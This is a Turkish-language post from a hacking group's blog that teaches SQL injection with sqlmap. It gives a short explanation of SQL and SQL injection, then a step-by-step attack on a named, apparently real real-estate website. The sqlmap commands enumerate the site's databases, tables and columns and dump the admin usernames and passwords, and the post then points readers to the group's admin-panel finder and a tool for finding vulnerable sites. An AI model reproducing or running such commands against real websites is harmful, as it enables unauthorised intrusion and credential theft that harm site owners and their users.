Tarih : | at : | Safemode : ON
> root@redhatz:~# Alımlar Başlamıştır. İletişim Bölümünden Alım Yapan Yöneticimize Ulaşabilirsiniz.
> root@redhatz:~# #redhatzopturkey 2016 Yeni Dönemi Artık Aktiftir. BİZİ TERCİH ETTİĞİNİZ İÇİN TEŞEKKÜRLER..



Başlık Yazar Yetki Comt Düzenlenen Kategori

SQLMap Kullanımı Ve Hack [2015] wyne redhatz rwxr-xr-x 1 20:13:00

Başlık SQLMap Kullanımı Ve Hack [2015]
Yetki rw-r--r--
Yazar wyne redhatz
Zaman 20:13:00
Kategori
Share
Merhaba dostlar..
Yavaş yavaş hack konularına girmemiz gerektiğini düşündük ve sqlmap yazılımı ile başlayalım dedik. İlk olarak sql nedir onu öğrenelim..

Sql, verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir. SQL'e özgü cümleler kullanarak veri tabanına kayıt eklenebilir, olan kayıtlar değiştirilebilir, silinebilir ve bu kayıtlardan listeler oluşturulabilir.

SQL Injection. web uygulamalarında ki en ciddi açıkların başında gelir. Özellikle frameworkler ve ORM (Object Relational Mapping) gibi ekstra veritabanı katmanlarının popülerleşmesi ile eskisine göre bugünlerde biraz daha az görülmektedir ama emin olun hala heryerdeler!
Web uygulaması geliştiricilercileri SQL Injection’ ı tam anlamadıklarından dolayı bazı ölümcül hatalar yaparlar. Bu yüzden bugün bilinen basit SQL Injection metodları o kadar çok görünmese de ileri de anlatacağımız ileri seviye SQL Injection açıklarını çok büyük firmalardan, hazır sistemlere kadar bir çok yerde görebilirsiniz.

Sqlmap, Sql tabanlı sitelerin güvenliğini denetlemek için kullanılan oldukça pratik bir araçtır. Normalde Linux üzerinden çalışır fakat Windows için olanı da mevcuttur; Windows için olanı çizgisel arabirime sahiptir, Linux için olanı ise komut satırı arayüzüne sahiptir..

Bir kaç (Ç)alıntı ile sql,sql injection ve sqmlmap kavramlarını tanıdık.
Başlayalım..

Kali linux kullanmakta iseniz zaten sisteminizde kuruludur. Ama kali linux kullanmıyorsanız aşağıdaki komut ile sisteminize indirebilirsiniz.
git clone git://git.kali.org/packages/sqlmap.git

bu komutu yazdıktan sonra terminale git bulanamadı tarzı hata alırsanız aşağıdaki komutu yazınız.
sudo apt-get install git

Ardında Sqlmap programının bulunduğu dizine geçelim.
cd sqlmap

Devam edelim.İlk olarak kendimize bir hedef site belirlememiz gerekiyor. (nerden bulcam ben sql açıklı siteyi? derseniz Sql Açıklı site bulma programını buradanindirebilirsiniz.Dilerseniz, bir hedef site belirleyebilir, bu sitedeki açıkları buradaki yazılım ile bulabilirsiniz.)

Belirlediğim site; " http://ceburealproperty.com/ "
Sql Error:  " http://ceburealproperty.com/show_cat_page.php?id=3' "

Şimdi terminale şu komutu yazalım;
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" --dbs

Aşağıdaki resimdeki gibi tarama yapılıyor. Az sonra databaseleri çekmiş olacaz..
Bazen bize E/H (Evet-Hayır) sorularını sorabilir. "E" diyerek devam ediyoruz. Kırmızı çıktılar haricinde..
Resimde görüldüğü gibi databaseleri bulduk..
"information_schema" değildir hiçbir zaman bunu bilin. Şimdi aşağıdaki komut ile devam edelim.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db --tables

-D parametresinin yanında Database ismini yazıyoruz. Bu sitede ki database  cebureal_db olduğu için cebureal_db yazdık. eğer database adı hacker_adana olsaydı parametremiz -D hacker_adana olurdu. --tables parametresi  ile tabloları arıyoruz...
evet cebureal_db databasesinin tablolarını bulduk. Şimdi burada şu önemli; buradaki tabloların içinde admin, user adında yada bu isimlerde tablo olmazsa bunlara yakın ismi olan tabloları seçmeliyiz. Burada direk admin olduğu için admin'i seçiyoruz. Ve aşağıdaki komutu yazıyoruz.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin --columns

Aynı mantık burada da geçerli. Seçtiğimiz kolonu -T parametresinin yanına yazıyoruz..
Komutu yazıp taramanın bitmesini bekleyelim..
Evet uzun bir tarama sonucunda kolonları bulduk..
Bize lazım olan Kullanıcı adı ve şifresi. Yukarıdaki resimde bunlar bulunmakta. Şimdi seçtiğimiz kolonların isimlerini -C parametresi yanına virgülle yazıyoruz..
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin -C username,password --dump

Şimdi enter ile devam edelim. --dump komutu dataları arayacak ve bize şifreleri ve kullanıcı adlarını çıkartacak..

Yukarıda görüldüğü gibi Kullanıcı adı ve şifresi çıktı. Bu kadar.. :)))
Şimdi admin bilgilerine ulaştığımıza göre Site'nin admin panelini bulup girmek kaldı..
Bu iş için Blogumuzda bulunan Admin Panel Finder Adlı yazılımı kullanabilirsiniz...
Tabi bu kolonlarda her zaman user ve password olacak diye bişey yok.. E-Mail gibi farklı bilgilerde çıkabilir..

1 yorum:

Yorum Gönder

Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey

Blogger tarafından desteklenmektedir.